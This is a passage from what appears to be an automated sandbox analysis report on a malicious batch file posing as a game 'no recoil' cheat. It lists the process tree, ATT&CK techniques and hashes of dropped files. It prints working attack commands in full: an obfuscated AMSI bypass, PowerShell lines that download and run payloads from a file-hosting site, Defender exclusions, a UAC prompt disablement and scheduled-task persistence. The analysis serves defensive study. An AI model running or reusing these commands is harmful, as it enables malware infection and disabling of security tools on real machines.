$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+'e'+'m.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+''+'s'+'');$WjJSnMNifeZVDU=$PCclBlqhkmEmR.GetMethod(''+'G'+''+[Char](101)+'tP'+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$prBEpaoXvRcRkyGmqVd=fvisBDWiciNp @([String])([IntPtr]);$MeOItiYcjByUgzUjFIwakl=fvisBDWiciNp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZRJsCwlZotK=$PCclBlqhkmEmR.GetMethod('G'+'e'+''+'t'+'M'+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+'a'+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$vXEplllghDyLHH=$WjJSnMNifeZVDU.Invoke($Null,@([Object]$ZRJsCwlZotK,[Object](''+[Char](76)+''+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$GlmPFUgKBCiWkfEGG=$WjJSnMNifeZVDU.Invoke($Null,@([Object]$ZRJsCwlZotK,[Object]('Vi'+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+[Char](116)+''+'e'+'c'+'t'+'')));$aKsMkoO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vXEplllghDyLHH,$prBEpaoXvRcRkyGmqVd).Invoke('a'+'m'+''+'s'+''+'i'+'.dll');$qZvpJmwfekPZYmYRe=$WjJSnMNifeZVDU.Invoke($Null,@([Object]$aKsMkoO,[Object](''+[Char](65)+'m'+[Char](115)+'iSc'+'a'+'n'+'B'+'u'+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$asgRNqTGJo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GlmPFUgKBCiWkfEGG,$MeOItiYcjByUgzUjFIwakl).Invoke($qZvpJmwfekPZYmYRe,[uint32]8,4,[ref]$asgRNqTGJo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qZvpJmwfekPZYmYRe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GlmPFUgKBCiWkfEGG,$MeOItiYcjByUgzUjFIwakl).Invoke($qZvpJmwfekPZYmYRe,[uint32]8,0x20,[ref]$asgRNqTGJo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('s'+'v'+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2188
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:1540
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:3608
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:2844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1556
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1952

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2584

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2980

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3256

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Aim_No_Recoil.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5068
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
      4⤵
      UAC bypass
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3452
  - - C:\ProgramData\FMyUS.eXe
      "C:\ProgramData\FMyUS.eXe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1912
    - - C:\Users\Admin\AppData\Local\Temp\bFQLYYir.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bFQLYYir.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
  - - C:\ProgramData\svOrbEl0.exe
      "C:\ProgramData\svOrbEl0.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2520
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:928
  - - C:\ProgramData\1ZRs6.EXe
      "C:\ProgramData\1ZRs6.EXe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol | find ":\"
    3⤵
    PID:2396
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:5032
  - - C:\Windows\system32\find.exe
      find ":\"
      4⤵
      PID:2612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath C:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath F:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath D:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'q';$url += 'x';$url += 't';$url += 'f';$url += 'g';$url += 'w';$url += '.';$url += 'm';$url += 'Z';$url += 'd';$url += '7';$url += 'u';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
  - - C:\Users\Public\winglog32.exe
      "C:\Users\Public\winglog32.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:324
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:228
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3740

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3944

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:5008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:5056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1700

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3120

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1724

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4928

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:4288
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RTYxMDk3MDItQUVGQi00NjE3LTk5QkQtRjQ4NDVEMDk1QUJFfSIgdXNlcmlkPSJ7MEQxRjhBRTctOUU3OC00MDhGLUI5OEUtRjM2QzI1NkYyRERDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MjlCRURFNDItOURERS00OEM0LThBNTgtMDhEN0RGMzgzMjUyfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODMzNzEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NDE5Mjc1MzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzUyODM0OTM0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Downloads MZ/PE file
PID:1184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1ZRs6.EXe

Filesize
163KB

MD5
b20e29f2b88234cda8b95b43a4fec8aa

SHA1
13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f

SHA256
e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a

SHA512
019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a

Download Submit
C:\ProgramData\FMyUS.eXe

Filesize
13KB

MD5
02a326274f6fbc2c10002e6989f4571f

SHA1
5d5aee1b6829fa401036968a034440fc07582191

SHA256
b677c04687a6360ba75cc71d70331b46c00794cbffc3a65205207a8369df4015

SHA512
30928b18c60eef0ba28017d1bdd8608a0ae51b006d4da6fd68b25aa7c639991ba720752cd6c346db14d32d5caa6a89355b70b31a6fd85187930740fd55524743

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
409KB

MD5
a72d5187f3f5a9dc9fb5f984dcbb0e47

SHA1
ef4bd15c3de0bfe5c4f20226ba460276a96690aa

SHA256
b36f9edbb9dfaf439609dc5ab5928ba47bc6504948bbe96ccffcfe1e2bd1f8f8

SHA512
c56cbed10a01cfb5cd66591d31eb1568a2000576ada251d3512dd597020440c99652f14ec367b2f7b7019a1921e12ac033490ada65e2bb9eec75754b919cb3a3

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
416KB

MD5
b28cf52d0a8578daf9f794d17a3ef3b1

SHA1
b04578cea589d998a09a3266c345b7b9a6ccb6d2

SHA256
c4703602de2a69869478a96a37231274639f5efb4e34e6b850d300058b82a689

SHA512
ed63a10dd4c4596e4fffefc9c6241b6879282383d49f70f31f57c8417744153a09145244dd63382d0564d565b163af703bafca55237f101d788b3df84a13bb67

Download Submit
C:\ProgramData\svOrbEl0.exe

Filesize
33KB

MD5
ccb23d1b4b52148a5b74f598b9cf34eb

SHA1
f9ac40de5bc8e0c7e534609c4a6e1261045cc24f

SHA256
53b972cd3facf2433a36caff23b3d962c2ea303dc3bcae84d80c2929862fae2a

SHA512
61556840d43ffd924eea1d9ddc3661e4869c0259db4bcf2319d3453c6feac1c547d984dc9f60370928ab18cddd722367e1191112b1abc579b352058336f19f0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svOrbEl0.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6dc5ee5e878718cea490ba834f5a5144

SHA1
a148e4ff95f72fe99736fe131d611b3bfd82d8e9

SHA256
b2ab1948b09df733a5d357d4ee094e65dcda170ef52d2a750c340ba082a7ee23

SHA512
d22bf1f530babab5a8e5c29de71604c59e6af88f4061044afc4c20efa9f54e8ef1ea30b467a7ccaa46fd4c586b3641b763a149a4b76870744d79320d2e416a70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
99bf743f192f300c84914caf4713852b

SHA1
b7a34cce60042859a0a23d586268e4af0160daba

SHA256
7c28362b3e3cdbb023644f9396a5f1a1af4e728662465783619947476f13a160

SHA512
fe6f82be8eddfce4100a3732650ccb44dba996acb3dd44f48ab7bceb1ca5aa69e3230c13b010f45f90da735103a3326e532f7a99cc771467a921d1eace13cc0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1f8b23cd03fdfb5d4559ac10c445b89f

SHA1
cea378877687b1967095d5237e3c0111929f012d

SHA256
f1bb0869c1d26c4282aa06a4840a9ca86e9145c136af42bb85b6d2e77e684551

SHA512
3ffe559e174f4706d3e7681f0d88d53dfde5eef56ee5005ccf7b3036a5d6ba85e02fa4d0cb213d237afcb894d79fbe673b18f986f57db2904558f447e42fe550

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ffaa33c7940b1713a06a430414e2fed0

SHA1
b1ade7d02b641ac9c382fad82cb1d31362fafb91

SHA256
a9c2268a32d4b53421c510878be105729a41bb03d01622456369d322e3e35c5e

SHA512
61913fe437de06bae8a99a02f3ff35f483d06ddd9593c16f9bb652dde94930ff47f1a07765b2d78ac5108abb65837a66444dc7ff9691ba9c9ceaf85f0ae73f4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cc19bcff372d20459d3651ba8aef50e7

SHA1
3c6f1d4cdd647864fb97a16b1aefba67fcee11f7

SHA256
366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9

SHA512
a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
50d3033f2bc3a3774c469d03e71a79a9

SHA1
22027b1d52085de99b3bffa276530fea5d961471

SHA256
2987e99ec7fa17bd4ab7de3cb4dc62645e1052012a5a357904d6fc6db9054147

SHA512
ecf7ab1a9e4192454a3e24c60453fd702a8c648e00078fc933b9182f4a3d3c10c6f5da622a5729b35727e6ddc8837029caddcaf76f56e805b9744253b56da5d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b3bc9ca267ea2969eb6201d77e58560c

SHA1
78f83a443aa1ca235edcab2da9e2fda6fecc1da4

SHA256
7ea18b6f900f2c30a5c34845d62d4fe9fc1f11e40714b3dbd69592cbfb5dc695

SHA512
8cc70e4f88f3d9f59beec22dafdb403144f7f390250205e08279a2f8e01e783af44ae31aa4a8a7ea05865b05303ac5e5048f7fb44488be538d9701b6195e9b28

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3qwaurk.fpb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
